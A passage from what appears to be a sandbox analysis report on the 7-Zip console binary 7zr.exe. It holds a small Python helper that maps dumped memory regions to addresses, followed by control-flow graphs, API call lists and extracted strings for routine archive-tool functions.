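    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        # The PAGE_EXECUTE* family occupies the 0x10..0x80 values.
        return bool(self.protect & 0xF0)


def parse_sdmp(name: str) -> Dump:
    """Split one .sdmp name into its (assumed) fields."""
    m = SDMP_RE.fullmatch(name.strip())
    if m is None:
        raise ValueError(f"not an sdmp name: {name!r}")
    return Dump(m.group(0), int(m["proc"], 16), int(m["base"], 16),
                int(m["protect"], 16), int(m["type"], 16))


def dumps_from_block(text: str) -> List[Dump]:
    """Extract every .sdmp name from pasted report text, page residue included."""
    return [parse_sdmp(m.group(0)) for m in SDMP_RE.finditer(text)]


def locate(addr: int, dumps: List[Dump]) -> Optional[Dump]:
    """Return the dump whose region contains addr, or None.

    The name carries no size, so (assumption) a region ends where the next
    dump of the same module begins; the last region is taken as one 4 KiB page.
    """
    ordered = sorted(dumps, key=lambda d: d.base)
    for i, cur in enumerate(ordered):
        end = ordered[i + 1].base if i + 1 < len(ordered) else cur.base + 0x1000
        if cur.base <= addr < end:
            return cur
    return None


def describe(addr: int, dumps: List[Dump]) -> str:
    """One-line verdict for an address quoted in an APIs list."""
    d = locate(addr, dumps)
    if d is None:
        return f"{addr:08X}: not inside any dumped region"
    return f"{addr:08X}: in {d.base:08X} {d.protect_name} {d.type_name}"


if __name__ == "__main__":
    regions = dumps_from_block(SAMPLE_BLOCK)
    for r in sorted(regions, key=lambda d: d.base):
        print(f"{r.base:08X} {r.protect_name:<22} {r.type_name}")
    # Call sites and data pointers quoted in the APIs lists on this page.
    for a in (0x5DA43E, 0x6555B8, 0x662938, 0x100000):
        print(describe(a, regions))
```

                                        Run against the block above, the fputs call site 005DA43E lands in the PAGE_EXECUTE_READ region at 005A1000, the 006555B8 pointer passed to _CxxThrowException in the next function lands in the PAGE_READONLY region at 0064C000 (where a _ThrowInfo structure belongs), and the 00662938 critical section passed to EnterCriticalSection further down lands in the PAGE_READWRITE region at 00662000. A quoted call site that resolved to a writable or MEM_PRIVATE region instead would be the point to start looking for unpacked or injected code.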

                                        Control-flow Graph

                                        control_flow_graph 478 5d993d-5d9950 call 5db5b1 481 5d9963-5d997e call 5b1f33 478->481 482 5d9952-5d995e call 5a1fb3 478->482 486 5d998f-5d9998 481->486 487 5d9980-5d998a 481->487 482->481 488 5d99a8 486->488 489 5d999a-5d99a6 486->489 487->486 490 5d99ab-5d99b5 488->490 489->488 489->490 491 5d99d5-5d9a04 call 5a1e0c call 5dacb6 490->491 492 5d99b7-5d99cc GetStdHandle GetConsoleScreenBufferInfo 490->492 500 5d9a0c-5d9a24 call 5c7b48 491->500 501 5d9a06-5d9a08 491->501 492->491 493 5d99ce-5d99d2 492->493 493->491 503 5d9a29-5d9a48 call 5db96d call 5c7018 call 5b1aa4 500->503 501->500 510 5d9a7c-5d9aa8 call 5cddb5 503->510 511 5d9a4a-5d9a4c 503->511 517 5d9aaa-5d9abb _CxxThrowException 510->517 518 5d9ac0-5d9ade 510->518 513 5d9a4e-5d9a55 511->513 514 5d9a66-5d9a77 _CxxThrowException 511->514 513->514 516 5d9a57-5d9a64 call 5b1ac8 513->516 514->510 516->510 516->514 517->518 520 5d9b3a-5d9b55 518->520 521 5d9ae0-5d9b04 call 5c7dd7 518->521 525 5d9b5c-5d9ba4 call 5a1fa0 fputs call 5a1fa0 strlen * 2 520->525 526 5d9b57 520->526 529 5d9bfa-5d9c0b _CxxThrowException 521->529 530 5d9b0a-5d9b0e 521->530 539 5d9baa-5d9be4 fputs fputc 525->539 540 5d9e25-5d9e4d call 5a1fa0 fputs call 5a1fa0 525->540 526->525 533 5d9c10 529->533 530->529 532 5d9b14-5d9b38 call 5dc077 call 5a1e40 530->532 532->520 532->521 536 5d9c12-5d9c25 533->536 543 5d9c27-5d9c33 536->543 544 5d9be6-5d9bf0 536->544 539->543 539->544 556 5d9f0c-5d9f34 call 5a1fa0 fputs call 5a1fa0 540->556 557 5d9e53 540->557 551 5d9c35-5d9c3d 543->551 552 5d9c81-5d9cb1 call 5db67d call 5a2e04 543->552 544->533 547 5d9bf2-5d9bf8 544->547 547->536 554 5d9c3f-5d9c4a 551->554 555 5d9c6b-5d9c80 call 5a21d8 551->555 593 5d9d10-5d9d28 call 5db67d 552->593 594 5d9cb3-5d9cb7 552->594 558 5d9c4c-5d9c52 554->558 559 5d9c54 554->559 555->552 579 5d9f3a 556->579 580 5dac23-5dac2a 556->580 562 5d9e5a-5d9e6f call 5db650 557->562 565 5d9c56-5d9c69 558->565 559->565 572 5d9e7b-5d9e7e call 5a21d8 562->572 573 5d9e71-5d9e79 562->573 565->554 565->555 585 5d9e83-5d9f06 call 5dbde4 fputs call 5a1fa0 572->585 573->585 586 5d9f41-5d9f9d call 5db650 call 5db5e9 call 5dbde4 fputs call 5a1fa0 579->586 581 5dac2c-5dac33 580->581 582 5dac3a-5dac66 call 5db96d call 5a1e40 call 5c3247 580->582 581->582 587 5dac35 call 5db988 581->587 619 5dac6e-5dacb5 call 5a1e40 call 5a11c2 call 5dbe0c call 5d2db9 582->619 620 5dac68-5dac6a 582->620 585->556 585->562 662 5d9f9f 586->662 587->582 617 5d9d4b-5d9d53 593->617 618 5d9d2a-5d9d4a fputs call 5a21d8 593->618 599 5d9cb9-5d9cbc call 5a315e 594->599 600 5d9cc1-5d9cdd call 5a31e5 594->600 599->600 613 5d9cdf-5d9d00 call 5a3221 call 5a31e5 call 5a1089 600->613 614 5d9d05-5d9d0e 600->614 613->614 614->593 614->594 625 5d9dff-5d9e1f call 5a1fa0 call 5a1e40 617->625 626 5d9d59-5d9d5d 617->626 618->617 620->619 625->539 625->540 632 5d9d5f-5d9d6d fputs 626->632 633 5d9d6e-5d9d82 626->633 632->633 638 5d9d84-5d9d88 633->638 639 5d9df0-5d9df9 633->639 645 5d9d8a-5d9d94 638->645 646 5d9d95-5d9d9f 638->646 639->625 639->626 645->646 652 5d9da5-5d9db1 646->652 653 5d9da1-5d9da3 646->653 660 5d9db8 652->660 661 5d9db3-5d9db6 652->661 653->652 659 5d9dd8-5d9dee 653->659 659->638 659->639 665 5d9dbb-5d9dce 660->665 661->665 662->580 670 5d9dd5 665->670 671 5d9dd0-5d9dd3 665->671 670->659 671->659
                                        APIs
                                          • Part of subcall function 005DB5B1: fputs.MSVCRT ref: 005DB5CA
                                          • Part of subcall function 005DB5B1: fputs.MSVCRT ref: 005DB5E1
                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 005D99BD
                                        • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 005D99C4
                                        • _CxxThrowException.MSVCRT(?,006555B8), ref: 005D9A77
                                        • _CxxThrowException.MSVCRT(?,006555B8), ref: 005D9ABB
                                          • Part of subcall function 005A1FB3: __EH_prolog.LIBCMT ref: 005A1FB8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                                        • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&f$p&f$N
                                        • API String ID: 377453556-746994273
                                        • Opcode ID: bbb72a3a0dd79dd50d68416de2f6a0c6060ac9f8af2ed012839c3eac67d5de76
                                        • Instruction ID: f100ef913e4c90b4606642d82e710ed78f803a84cfe47c00e12f44950e2bc12b
                                        • Opcode Fuzzy Hash: bbb72a3a0dd79dd50d68416de2f6a0c6060ac9f8af2ed012839c3eac67d5de76
                                        • Instruction Fuzzy Hash: A5226E31900209DFDF25EFA8D889BADBBB2FF45311F20005BE545A7292CB359A85CF65

                                        Control-flow Graph

                                        control_flow_graph 672 5b1ade-5b1b14 call 63fb10 call 5a13f5 677 5b1b32-5b1b8b _fileno _isatty _fileno _isatty _fileno _isatty 672->677 678 5b1b16-5b1b2d call 5c1d73 _CxxThrowException 672->678 680 5b1b9d-5b1b9f 677->680 681 5b1b8d-5b1b91 677->681 678->677 682 5b1ba0-5b1bcd 680->682 681->680 684 5b1b93-5b1b97 681->684 685 5b1bf9-5b1c12 682->685 686 5b1bcf-5b1bf8 call 5b1ea4 call 5a27bb call 5a1e40 682->686 684->680 687 5b1b99-5b1b9b 684->687 689 5b1c20 685->689 690 5b1c14-5b1c18 685->690 686->685 687->682 693 5b1c27-5b1c2b 689->693 690->689 692 5b1c1a-5b1c1e 690->692 692->689 692->693 695 5b1c2d 693->695 696 5b1c34-5b1c3e 693->696 695->696 698 5b1c49-5b1c53 696->698 699 5b1c40-5b1c43 696->699 700 5b1c5e-5b1c68 698->700 701 5b1c55-5b1c58 698->701 699->698 703 5b1c6a-5b1c6d 700->703 704 5b1c73-5b1c79 700->704 701->700 703->704 706 5b1c7b-5b1c87 704->706 707 5b1cc9-5b1cd2 704->707 708 5b1c89-5b1c93 706->708 709 5b1c95-5b1ca1 call 5b1ed1 706->709 710 5b1cea call 5b1eb9 707->710 711 5b1cd4-5b1ce6 707->711 708->707 718 5b1ca3-5b1cbb call 5c1d73 _CxxThrowException 709->718 719 5b1cc0-5b1cc3 709->719 714 5b1cef-5b1cf8 710->714 711->710 716 5b1cfa-5b1d0a 714->716 717 5b1d37-5b1d40 714->717 720 5b1dc2-5b1dd4 wcscmp 716->720 721 5b1d10 716->721 723 5b1e93-5b1ea1 717->723 724 5b1d46-5b1d52 717->724 718->719 719->707 725 5b1d17-5b1d1f call 5a9399 720->725 727 5b1dda-5b1de6 call 5b1ed1 720->727 721->725 724->723 728 5b1d58-5b1d93 call 5a26dd call 5a280c call 5a3221 call 5a3bbf 724->728 725->717 737 5b1d21-5b1d32 call 626a60 call 5a9313 725->737 727->725 735 5b1dec-5b1e04 call 5c1d73 _CxxThrowException 727->735 756 5b1d9f-5b1da3 728->756 757 5b1d95-5b1d9c 728->757 744 5b1e09-5b1e0c 735->744 737->717 747 5b1e0e 744->747 748 5b1e31-5b1e4a call 5b1f0c GetCurrentProcess SetProcessAffinityMask 744->748 751 5b1e10-5b1e12 747->751 752 5b1e14-5b1e2c call 5c1d73 _CxxThrowException 747->752 761 5b1e4c-5b1e82 GetLastError call 5a3221 call 5a58a9 call 5a31e5 call 5a1e40 748->761 762 5b1e83-5b1e92 call 5a3172 call 5a1e40 748->762 751->748 751->752 752->748 756->744 760 5b1da5-5b1dbd call 5c1d73 _CxxThrowException 756->760 757->756 760->720 761->762 762->723
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B1AE3
                                          • Part of subcall function 005A13F5: __EH_prolog.LIBCMT ref: 005A13FA
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1B2D
                                        • _fileno.MSVCRT ref: 005B1B3E
                                        • _isatty.MSVCRT ref: 005B1B47
                                        • _fileno.MSVCRT ref: 005B1B5D
                                        • _isatty.MSVCRT ref: 005B1B60
                                        • _fileno.MSVCRT ref: 005B1B73
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1CBB
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1DBD
                                        • wcscmp.MSVCRT ref: 005B1DCA
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1E04
                                        • _isatty.MSVCRT ref: 005B1B76
                                          • Part of subcall function 005C1D73: __EH_prolog.LIBCMT ref: 005C1D78
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1E2C
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 005B1E3B
                                        • SetProcessAffinityMask.KERNEL32(00000000), ref: 005B1E42
                                        • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 005B1E4C
                                        Strings
                                        • Unsupported switch postfix for -slp, xrefs: 005B1DF1
                                        • unsupported value -stm, xrefs: 005B1E19
                                        • Set process affinity mask: , xrefs: 005B1D74
                                        • Unsupported switch postfix -bb, xrefs: 005B1CA8
                                        • Unsupported switch postfix -stm, xrefs: 005B1DAA
                                        • SeLockMemoryPrivilege, xrefs: 005B1D28
                                        • : ERROR : , xrefs: 005B1E52
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                        • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                                        • API String ID: 1826148334-1115009270
                                        • Opcode ID: c7d37602a532b0b46f108c531f153f70f015d94fdac41fc267a6bbf879b23506
                                        • Instruction ID: 808ea470f434b6e09deb81b57e260f2f10ec2474cdd525c6a83126045868713c
                                        • Opcode Fuzzy Hash: c7d37602a532b0b46f108c531f153f70f015d94fdac41fc267a6bbf879b23506
                                        • Instruction Fuzzy Hash: EEC11F319006469FDB51DFB8C898BDDBFF6BF0A314F048459E485972A2CB74AD44CB68

                                        Control-flow Graph

                                        control_flow_graph 777 5d8012-5d8032 call 63fb10 780 5d8038-5d806c fputs call 5d8341 777->780 781 5d8285 777->781 785 5d806e-5d8071 780->785 786 5d80c8-5d80cd 780->786 782 5d8287-5d8295 781->782 789 5d808b-5d808d 785->789 790 5d8073-5d8089 fputs call 5a1fa0 785->790 787 5d80cf-5d80d4 786->787 788 5d80d6-5d80df 786->788 793 5d80e2-5d8110 call 5d8341 call 5d8622 787->793 788->793 791 5d808f-5d8094 789->791 792 5d8096-5d809f 789->792 790->786 795 5d80a2-5d80c7 call 5a2e47 call 5d85c6 call 5a1e40 791->795 792->795 804 5d811e-5d812f call 5d8565 793->804 805 5d8112-5d8119 call 5d831f 793->805 795->786 804->782 812 5d8135-5d813f 804->812 805->804 813 5d814d-5d815b 812->813 814 5d8141-5d8148 call 5d82bb 812->814 813->782 817 5d8161-5d8164 813->817 814->813 818 5d81b6-5d81c0 817->818 819 5d8166-5d8186 817->819 820 5d8276-5d827f 818->820 821 5d81c6-5d81e1 fputs 818->821 823 5d818c-5d8196 call 5d8565 819->823 824 5d8298-5d829d 819->824 820->780 820->781 821->820 827 5d81e7-5d81fb 821->827 829 5d819b-5d819d 823->829 828 5d82b1-5d82b9 SysFreeString 824->828 830 5d81fd-5d821f 827->830 831 5d8273 827->831 828->782 829->824 832 5d81a3-5d81b4 SysFreeString 829->832 834 5d829f-5d82a1 830->834 835 5d8221-5d8245 830->835 831->820 832->818 832->819 836 5d82ae 834->836 838 5d8247-5d8271 call 5d84a7 call 5a965d SysFreeString 835->838 839 5d82a3-5d82ab call 5a965d 835->839 836->828 838->830 838->831 839->836
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D8017
                                        • fputs.MSVCRT ref: 005D804D
                                          • Part of subcall function 005D8341: __EH_prolog.LIBCMT ref: 005D8346
                                          • Part of subcall function 005D8341: fputs.MSVCRT ref: 005D835B
                                          • Part of subcall function 005D8341: fputs.MSVCRT ref: 005D8364
                                        • fputs.MSVCRT ref: 005D807A
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                          • Part of subcall function 005A965D: VariantClear.OLEAUT32(?), ref: 005A967F
                                        • SysFreeString.OLEAUT32(00000000), ref: 005D81AA
                                        • fputs.MSVCRT ref: 005D81CD
                                        • SysFreeString.OLEAUT32(00000000), ref: 005D8267
                                        • SysFreeString.OLEAUT32(00000000), ref: 005D82B1
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                        • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                        • API String ID: 2889736305-3797937567
                                        • Opcode ID: fe938a0335edd78455ee998727d228b5bd7126ceadd661a5e85de8a082126df5
                                        • Instruction ID: 75987434d87945588a6187f7bea8b196c6ecd051ca71e06646992bcc8ef6a3d0
                                        • Opcode Fuzzy Hash: fe938a0335edd78455ee998727d228b5bd7126ceadd661a5e85de8a082126df5
                                        • Instruction Fuzzy Hash: 34914B75A00605EFDB24DFA8CD85ABEBBB6FF48310F10452AE512A7391DB70AD05CB60

                                        Control-flow Graph

                                        control_flow_graph 846 5d6766-5d6792 call 63fb10 EnterCriticalSection 849 5d67af-5d67b7 846->849 850 5d6794-5d6799 call 5dc7d7 846->850 851 5d67be-5d67c3 849->851 852 5d67b9 call 5a1f91 849->852 854 5d679e-5d67ac 850->854 856 5d67c9-5d67d5 851->856 857 5d6892-5d68a8 851->857 852->851 854->849 858 5d6817-5d682f 856->858 859 5d67d7-5d67dd 856->859 860 5d68ae-5d68b4 857->860 861 5d6941 857->861 864 5d6831-5d6842 call 5a1fa0 858->864 865 5d6873-5d687b 858->865 859->858 862 5d67df-5d67eb 859->862 860->861 863 5d68ba-5d68c2 860->863 866 5d6943-5d695a 861->866 869 5d67ed 862->869 870 5d67f3-5d6801 862->870 868 5d6933-5d693f call 5dc5cd 863->868 871 5d68c4-5d68e6 call 5a1fa0 fputs 863->871 864->865 883 5d6844-5d686c fputs call 5a2201 864->883 867 5d6881-5d6887 865->867 865->868 867->868 873 5d688d 867->873 868->866 869->870 870->865 875 5d6803-5d6815 fputs 870->875 887 5d68e8-5d68f9 fputs 871->887 888 5d68fb-5d6917 call 5b4f2a call 5a1fb3 call 5a1e40 871->888 879 5d692e call 5a1f91 873->879 881 5d686e call 5a1fa0 875->881 879->868 881->865 883->881 890 5d691c-5d6928 call 5a1fa0 887->890 888->890 890->879
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D676B
                                        • EnterCriticalSection.KERNEL32(00662938), ref: 005D6781
                                        • fputs.MSVCRT ref: 005D680B
                                        • LeaveCriticalSection.KERNEL32(00662938), ref: 005D6944
                                          • Part of subcall function 005DC7D7: fputs.MSVCRT ref: 005DC840
                                        • fputs.MSVCRT ref: 005D6851
                                          • Part of subcall function 005A2201: fputs.MSVCRT ref: 005A221E
                                        • fputs.MSVCRT ref: 005D68D9
                                        • fputs.MSVCRT ref: 005D68F6
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                        • String ID: v$8)f$8)f$Sub items Errors:
                                        • API String ID: 2670240366-3843526198
                                        • Opcode ID: 09a06930428ea5d06d699f397d528edfaaea9c986b380c3df2015414a692434b
                                        • Instruction ID: 211ada235eefcf49633091c87c6f05a2afbd897e39b361103548446012ac56ad
                                        • Opcode Fuzzy Hash: 09a06930428ea5d06d699f397d528edfaaea9c986b380c3df2015414a692434b
                                        • Instruction Fuzzy Hash: 65517835501A41CFCB35AF68D8A4AAABBE2FF85310F54482FE19A87361DB316C46CB54

                                        Control-flow Graph

                                        control_flow_graph 898 5d6359-5d6373 call 63fb10 901 5d639e-5d63af call 5d5a4d 898->901 902 5d6375-5d6385 call 5dc7d7 898->902 908 5d65ee-5d65f1 901->908 909 5d63b5-5d63cd 901->909 902->901 907 5d6387-5d639b 902->907 907->901 910 5d6624-5d663c 908->910 911 5d65f3-5d65fb 908->911 912 5d63cf 909->912 913 5d63d2-5d63d4 909->913 916 5d663e call 5a1f91 910->916 917 5d6643-5d664b 910->917 914 5d66ea call 5dc5cd 911->914 915 5d6601-5d6607 call 5d8012 911->915 912->913 918 5d63df-5d63e7 913->918 919 5d63d6-5d63d9 913->919 929 5d66ef-5d66fd 914->929 932 5d660c-5d660e 915->932 916->917 917->914 921 5d6651-5d668f fputs call 5a211a call 5a1fa0 call 5d8685 917->921 922 5d63e9-5d63f2 call 5a1fa0 918->922 923 5d6411-5d6413 918->923 919->918 920 5d64b1-5d64bc call 5d6700 919->920 947 5d64be-5d64c1 920->947 948 5d64c7-5d64cf 920->948 921->929 983 5d6691-5d6697 921->983 922->923 943 5d63f4-5d640c call 5a210c call 5a1fa0 922->943 930 5d6415-5d641d 923->930 931 5d6442-5d6446 923->931 936 5d641f-5d6425 call 5d6134 930->936 937 5d642a-5d643b 930->937 940 5d6448-5d6450 931->940 941 5d6497-5d649f 931->941 932->929 938 5d6614-5d661f call 5a1fa0 932->938 936->937 937->931 938->914 949 5d647f-5d6490 940->949 950 5d6452-5d647a fputs call 5a1fa0 call 5a1fb3 call 5a1fa0 940->950 941->920 944 5d64a1-5d64ac call 5a1fa0 call 5a1f91 941->944 943->923 944->920 947->948 958 5d65a2-5d65a6 947->958 951 5d64f9-5d64fb 948->951 952 5d64d1-5d64da call 5a1fa0 948->952 949->941 950->949 963 5d64fd-5d6505 951->963 964 5d652a-5d652e 951->964 952->951 980 5d64dc-5d64f4 call 5a210c call 5a1fa0 952->980 966 5d65a8-5d65b6 958->966 967 5d65da-5d65e6 958->967 973 5d6507-5d650d call 5d6134 963->973 974 5d6512-5d6523 963->974 976 5d657f-5d6587 964->976 977 5d6530-5d6538 964->977 978 5d65b8-5d65ca call 5d6244 966->978 979 5d65d3 966->979 967->909 970 5d65ec 967->970 970->908 973->974 974->964 976->958 982 5d6589-5d6595 call 5a1fa0 976->982 985 5d653a-5d6562 fputs call 5a1fa0 call 5a1fb3 call 5a1fa0 977->985 986 5d6567-5d6578 977->986 978->979 996 5d65cc-5d65ce call 5a1f91 978->996 979->967 980->951 982->958 1005 5d6597-5d659d call 5a1f91 982->1005 991 5d66df-5d66e5 call 5a1f91 983->991 992 5d6699-5d669f 983->992 985->986 986->976 991->914 1000 5d66a1-5d66b1 fputs 992->1000 1001 5d66b3-5d66ce call 5b4f2a call 5a1fb3 call 5a1e40 992->1001 996->979 1006 5d66d3-5d66da call 5a1fa0 1000->1006 1001->1006 1005->958 1006->991
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D635E
                                        • fputs.MSVCRT ref: 005D645F
                                          • Part of subcall function 005DC7D7: fputs.MSVCRT ref: 005DC840
                                        • fputs.MSVCRT ref: 005D6547
                                        • fputs.MSVCRT ref: 005D665F
                                        • fputs.MSVCRT ref: 005D66AE
                                          • Part of subcall function 005A1F91: fflush.MSVCRT ref: 005A1F93
                                          • Part of subcall function 005A1FB3: __EH_prolog.LIBCMT ref: 005A1FB8
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$H_prolog$fflushfree
                                        • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                        • API String ID: 1750297421-1898165966
                                        • Opcode ID: 4726cacd0c88b63e2f0f76938dbb88ca46e5798f0d668424ea7d250d09fec6e6
                                        • Instruction ID: 2287e18fafd45af32a0a2abf491ee3af8e5899ef06dbd57879d620ddcae91552
                                        • Opcode Fuzzy Hash: 4726cacd0c88b63e2f0f76938dbb88ca46e5798f0d668424ea7d250d09fec6e6
                                        • Instruction Fuzzy Hash: 6EB18E34601B428FDB34EF68D995BAABBE2BF85304F04442FE55A47392CB30A845CF64

                                        Control-flow Graph

                                        control_flow_graph 1016 5a9c8f-5a9cc2 GetModuleHandleA GetProcAddress 1017 5a9cef-5a9d06 GlobalMemoryStatus 1016->1017 1018 5a9cc4-5a9ccc GlobalMemoryStatusEx 1016->1018 1019 5a9d0b-5a9d0d 1017->1019 1020 5a9d08 1017->1020 1018->1017 1021 5a9cce-5a9cd7 1018->1021 1024 5a9d11-5a9d15 1019->1024 1020->1019 1022 5a9cd9 1021->1022 1023 5a9ce5 1021->1023 1025 5a9cdb-5a9cde 1022->1025 1026 5a9ce0-5a9ce3 1022->1026 1027 5a9ce8-5a9ced 1023->1027 1025->1023 1025->1026 1026->1027 1027->1024
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 005A9CB3
                                        • GetProcAddress.KERNEL32(00000000), ref: 005A9CBA
                                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 005A9CC8
                                        • GlobalMemoryStatus.KERNEL32(?), ref: 005A9CFA
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                        • API String ID: 180289352-802862622
                                        • Opcode ID: 65e47c0855a27911124847507d4210bcba684e5afce785636932182ccd070ab1
                                        • Instruction ID: 8ea111973b83a7f0174b0a86316f338a81d17b2b8fa8b6acb97e2bad891d126b
                                        • Opcode Fuzzy Hash: 65e47c0855a27911124847507d4210bcba684e5afce785636932182ccd070ab1
                                        • Instruction Fuzzy Hash: 3F1157749416299BCF24DFA4D8A9AADBBF6BB05725F10041CE442AB240D778A980CB54

                                        Control-flow Graph

                                        control_flow_graph 1028 5ef1b2-5ef1ce call 63fb10 call 5b1168 1032 5ef1d3-5ef1d5 1028->1032 1033 5ef36a-5ef378 1032->1033 1034 5ef1db-5ef1e4 call 5ef3e4 1032->1034 1037 5ef1ed-5ef1f2 1034->1037 1038 5ef1e6-5ef1e8 1034->1038 1039 5ef1f4-5ef1f9 1037->1039 1040 5ef203-5ef21a 1037->1040 1038->1033 1039->1040 1041 5ef1fb-5ef1fe 1039->1041 1043 5ef21c-5ef22c _CxxThrowException 1040->1043 1044 5ef231-5ef248 memcpy 1040->1044 1041->1033 1043->1044 1045 5ef24c-5ef257 1044->1045 1046 5ef25c-5ef25e 1045->1046 1047 5ef259 1045->1047 1048 5ef260-5ef26f 1046->1048 1049 5ef281-5ef299 1046->1049 1047->1046 1050 5ef279-5ef27b 1048->1050 1051 5ef271 1048->1051 1057 5ef29b-5ef2a0 1049->1057 1058 5ef311-5ef313 1049->1058 1050->1049 1054 5ef315-5ef318 1050->1054 1052 5ef277 1051->1052 1053 5ef273-5ef275 1051->1053 1052->1050 1053->1050 1053->1052 1056 5ef357-5ef368 1054->1056 1056->1033 1057->1054 1059 5ef2a2-5ef2b5 call 5ef37b 1057->1059 1058->1056 1063 5ef2b7-5ef2cf call 63e1a0 